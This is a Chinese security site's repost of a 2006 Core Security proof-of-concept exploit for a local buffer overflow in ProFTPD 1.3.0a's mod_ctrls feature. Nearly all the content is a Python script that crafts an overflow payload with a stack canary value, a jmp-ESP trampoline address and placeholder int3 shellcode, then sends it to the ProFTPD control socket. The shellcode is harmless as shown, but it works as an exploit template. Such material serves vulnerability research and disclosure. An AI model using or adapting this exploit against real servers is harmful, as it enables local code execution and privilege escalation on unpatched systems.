首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
来源:vfocus.net 作者:vfocus 发布时间:2006-12-14  

# Core Security Technologies - Corelabs Advisory
# ProFTPD Controls buffer overflow

import socket
import os, os.path,stat

#This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (ubuntu edgy)
#
ctrlSocket = "/tmp/ctrls.sock"
mySocket = "/tmp/notused.sock"
canary = "\0\0\x0a\xff"
trampoline = "\x77\xe7\xff\xff" # jmp ESP on vdso
shellcode = "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" # inocuous "int 3"

#Build Payload. The format on the stack is:
#
#AAAA = EBX BBBB = ESI CCCC = EDI DDDD = EBP EEEE = EIP
payload = ("A"*512) + canary + "AAAABBBBCCCCDDDD" + trampoline + shellcode

#Setup socket
#
if os.path.exists(mySocket):
os.remove(mySocket)
s = socket.socket(socket.AF_UNIX,socket.SOCK_STREAM)
s.bind(mySocket)
os.chmod(mySocket,stat.S_IRWXU)
s.connect(ctrlSocket)

#Send payload
#
s.send("\1\0\0\0")
s.send("\1\0\0\0")
l = len(payload)
s.send(chr(l & 255)+chr((l/255) & 255)+"\0\0")
s.send(payload)

#Finished
#
s.close()



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Crob FTP Server 3.6.1 build 26
·MS Internet Explorer 7 (DLL-lo
·mxBB Module newssuite 1.5 Rem
·yaplap <= 0.6.1b (ldap.php)
·D-Link DWL-2000AP 2.11 (ARP Fl
·Kerio MailServer 6.2.2 preauth
·Golden FTP server 1.92 (USER/P
·OpenLDAP <= 2.4.3 (KBIND) R
·mxBB Module Activity Games 0.9
·Sambar FTP Server 6.4 (SIZE) R
·Fantastic News 2.1.4 (news.php
·Windows Media Player 9/10 (MID
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved